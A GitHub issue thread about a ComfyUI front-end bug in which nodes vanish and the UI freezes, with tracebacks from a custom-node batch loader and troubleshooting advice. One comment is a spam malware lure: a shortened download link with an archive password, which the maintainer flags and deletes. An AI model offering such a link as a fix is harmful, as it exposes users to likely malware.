### ISSUE TITLE
All Nodes Invisible, plus UI Froze when zooming out

### ISSUE THREAD

**Issue by MushroomFleet** [comfyanonymous/ComfyUI#4995]
### Expected Behavior

Nodes do not normally disappear.

### Actual Behavior

Restarted PC to make sure its not that, nothing was changed and persists after an update. Total mystery to be honest.
The Error i saw was this around 100 times:

```
File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\WAS_Node_Suite.py", line 5299, in load_batch_images
    image, filename = fl.get_image_by_id(index)
    ^^^^^^^^^^^^^^^
TypeError: cannot unpack non-iterable NoneType object
```

Any advice welcome.

### Steps to Reproduce

Example:
https://i.gyazo.com/f365bac3d6954b9caaf721b4adcf816b.png
![image](https://github.com/user-attachments/assets/282f2b4f-a0f4-4db2-8bec-a01a1954f085)

Started when i had to stop the server, after queueing images to a job that did not exist (batch directory load, 60 images in folder, loaded from 60, not 0) This caused a deluge of "image not found errors" so i ctrl+c the terminal.

On reloading the ComfyUI, all nodes are invisible if you zoom out and the UI freezes. If a job has been queued it will continue to run, this is only affecting the UI.

### Debug Logs

```powershell
This goes back for hundreds of images, that did not exist, the range was supposed to start from 0, not 220 which is where it ended. I hope this makes sense, because we have to reset these 0's all the time in comfy with batch processing

Prompt executed in 0.02 seconds
No pending upload
Executed {'node': '1545', 'display_node': '1545', 'output': {'text': ['./CAP/blacksunv2/set']}, 'prompt_id': 'f59b4c98-6608-4e66-b346-5e920df9cda1'}
WAS Node Suite Error: Invalid image index `221`
!!! Exception during processing !!! cannot unpack non-iterable NoneType object
Traceback (most recent call last):
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 323, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 198, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\WAS_Node_Suite.py", line 5299, in load_batch_images
    image, filename = fl.get_image_by_id(index)
    ^^^^^^^^^^^^^^^
TypeError: cannot unpack non-iterable NoneType object

Prompt executed in 0.02 seconds
No pending upload
Executed {'node': '1545', 'display_node': '1545', 'output': {'text': ['./CAP/blacksunv2/set']}, 'prompt_id': '03d38158-3c05-4858-b84c-5d9350cc4ba9'}
WAS Node Suite Error: Invalid image index `222`
!!! Exception during processing !!! cannot unpack non-iterable NoneType object
Traceback (most recent call last):
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 323, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 198, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\WAS_Node_Suite.py", line 5299, in load_batch_images
    image, filename = fl.get_image_by_id(index)
    ^^^^^^^^^^^^^^^
TypeError: cannot unpack non-iterable NoneType object

Prompt executed in 0.02 seconds
No pending upload
Executed {'node': '1545', 'display_node': '1545', 'output': {'text': ['./CAP/blacksunv2/set']}, 'prompt_id': '8e20ca17-205b-412b-9c92-5f7a16e32abf'}
WAS Node Suite Error: Invalid image index `223`
!!! Exception during processing !!! cannot unpack non-iterable NoneType object
Traceback (most recent call last):
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 323, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 198, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\WAS_Node_Suite.py", line 5299, in load_batch_images
    image, filename = fl.get_image_by_id(index)
    ^^^^^^^^^^^^^^^
TypeError: cannot unpack non-iterable NoneType object

Prompt executed in 0.02 seconds
No pending upload
Executed {'node': '1545', 'display_node': '1545', 'output': {'text': ['./CAP/blacksunv2/set']}, 'prompt_id': 'e302b5c2-1316-4e25-84c7-be4ebcb99971'}
WAS Node Suite Error: Invalid image index `224`
!!! Exception during processing !!! cannot unpack non-iterable NoneType object
Traceback (most recent call last):
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 323, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 198, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\MACHINES3\ComfyUI_windows_portable_nvidia_cu121_or_cpu\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\WAS_Node_Suite.py", line 5299, in load_batch_images
    image, filename = fl.get_image_by_id(index)
    ^^^^^^^^^^^^^^^
TypeError: cannot unpack non-iterable NoneType object

Prompt executed in 0.02 seconds
No pending upload
```

### Other

after the error was presented and i closed the terminal, this problem arised and has not resolved itself.
unsure how stopping the server in this way would cause this problem.

**Comment by SAMBILI** [comment]
download
https://bit.ly/3TzaAQd
Archive codepass: changeme

you may need to install the c compiler

**Comment by MushroomFleet** [comment]
> download https://bit.ly/3TzaAQd Archive codepass: changeme
> 
> you may need to install the c compiler

what are you talking about?

**Comment by comfyanonymous** [comment]
don't run anything from that comment I just deleted it's very likely malware.

**Comment by MushroomFleet** [comment]
> don't run anything from that comment I just deleted it's very likely malware.

thanks, it looked a bit sus :)

https://i.gyazo.com/7414f10f5d9f88d9a0b706b258cbdcca.gif

i created this gif to show the bug a bit better
it quite strange, not seen it before.

**Comment by comfyanonymous** [comment]
if you: --disable-all-custom-nodes is the issue still there?

**Comment by MushroomFleet** [comment]
> if you: --disable-all-custom-nodes is the issue still there?

seems to be working proper with zero nodes loaded, yes.
strange as i had not added anything/updated since days before this bug started today.

I guess this means one of the custom nodes is the cause, while it suddenly started despite no changes being made.
very confusing.

**Comment by MushroomFleet** [comment]
I will disable all 96 nodes and enable them one by one to determine the breakdown

thanks

**Comment by LukeG89** [comment]
Maybe it's related to the same error I got in version 1.2.59 of the front-end: https://github.com/Comfy-Org/ComfyUI_frontend/issues/894.
There is a conflict with [rgthree](https://github.com/rgthree/rgthree-comfy)

**Comment by MushroomFleet** [comment]
update: i re-enabled all my custom nodes and its all working now?

a strange one, thanks for the help !!

[nodes_log.txt](https://github.com/user-attachments/files/17076619/nodes_log.txt)

**Comment by clownvary** [comment]
same issue after upgrade comfyui , back to version v0.3.18 can resolve this issue, buut latest version still have same isse.

**Comment by ltdrdata** [comment]
> same issue after upgrade comfyui , back to version v0.3.18 can resolve this issue, buut latest version still have same isse.

You need to disable some custom nodes.
The old `comfyui-mixlab-nodes` and `ComfyUI-0246` are known to cause such issue.
